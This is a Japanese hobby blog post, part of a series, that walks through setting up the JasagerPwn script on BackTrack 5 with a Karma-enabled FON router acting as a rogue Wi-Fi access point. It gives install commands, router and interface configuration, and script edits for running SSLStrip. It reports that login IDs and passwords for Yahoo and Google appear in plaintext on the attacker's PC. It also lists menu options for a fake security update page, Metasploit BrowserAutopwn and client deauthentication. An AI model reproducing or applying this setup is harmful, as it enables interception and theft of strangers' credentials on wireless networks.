SSブログ

【Jasager #7 JasagerPwn スクリプト BackTrack 5 用】 [Jasager]

JasagerPwn は、jasager と BackTrack 5 で動作するスクリプトで、SSLStrip などが自動実行できる。
http://code.google.com/p/jasagerpwn/
今現在も、頻繁に更新されている。

アタッカー PC とjasager FON を LAN 接続する。アタッカー PC は ISP の無線 LAN ルーター(192.168.0.1)に、wifi 接続している(wicd で接続)。
アタッカー PC で、jasagerPwn を起動する。
ターゲットPC ・・・>jasagerFON--->アタッカーPC・・・>ISPルーター --->internet
(・・・> 無線  ---> 有線)

pc222

別のパソコンを jasager FON に wifi 接続し、yahoo, google 等にログインすると、
アタッカー PC の SSLStrip ウインドウに、ID,PASS が表示される。
snapshot1

snapshot1

jasager は、FON のカスタムファームウェアで、Karma が組み込まれている。
FON2100/2200 で利用できる。
【Jasager #1 Jasager のイ..

BackTrack 5 は、ペネトレーションテスト用Linux
http://www.backtrack-linux.org/

yahoo も google もログインボタンを押すと、https:// のログインページが開くが、https なら、ID、PASSも含め全ての通信が暗号化される。
ところが SSL Strip されている場合、jasager FON につないだパソコンは、なぜかログインページが http:// になる。他に違いはなく、注意していないと気が付かないだろう。

(1) BT5 でのインストール

apt-get install php5 dhcp3-server macchanger dsniff aircrack-ng apache2 libapache2-mod-php5
apt-get -y install python-twisted-bin python-twisted-core python-twisted-web python-twisted-web2
cd /pentest/exploits/set/
chmod +x setup.py
python setup.py
cd /pentest/wireless/aircrack-ng/scripts/airdrop-ng/
chmod +x install.py
python install.py
cd /pentest/
wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
tar xvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
chmod +x setup.py
python setup.py build
python setup.py install
svn checkout http://jasagerpwn.googlecode.com/svn/trunk/  jasagerpwn-read-only

eth0 のdhcp設定を無効にする。
/etc/network/interfaces

#auto eth0
#iface eth0 inet dhcp

(2) FON の設定
IPを 192.168.10.2 に設定する。
/etc/config/network

config 'interface' 'lan'
        option 'ifname' 'eth0'
        option 'type' 'bridge'
        option 'netmask' '255.255.255.0'
        option 'macaddr' ''
        option 'ip6addr' ''
        option 'ip6gw' ''
        option 'ipaddr' '192.168.10.2'
        option 'gateway' '192.168.10.1'
        option 'proto' 'static'
        option 'dns' '192.168.10.1'

(3) FON の dhcp サーバの無効化。

/etc/init.d/dnsmasq stop
/etc/init.d/dnsmasq disable

(4) BT5 の jasagerPwn スクリプトの変更
環境によっては、変更不要かもしれない。
19行

fonIP=”192.168.10.1

21行

#wirelessAtkIFACE="wlan1"
wirelessAtkIFACE="wlan0"

(5) jasagerPwn の実行

./jasagerPwn

jasagerPwn の実行メニューが表示される。 [1]が SSLStrip

[1][S] = Sniff The APs Network.
[2][F] = Redirect LAN to Fake Security Update Page.
[3][B] = Redirect LAN to Metasploit BrowserAutopwn.
[4][J] = Redirect LAN to Java Applet Page.
[5][D] = De-Authorize Clients on other APs.
[6][N] = Adjust Script & Network Settings
[7][X] = Exit JasagerPwn Script

SSLStripでは、ログインページが http:// になり、ID、PASSが平文で送信される。
説明では https ログインページの95%が、解析可能とのことだ。


nice!(2)  コメント(0)  トラックバック(1) 

nice! 2

コメント 0

コメントを書く

お名前:
URL:
コメント:
画像認証:
下の画像に表示されている文字を入力してください。

Facebook コメント

トラックバック 1

【Jasager #6 Jasager ..【Jasager #8 JasagerP.. ブログトップ

この広告は前回の更新から一定期間経過したブログに表示されています。更新すると自動で解除されます。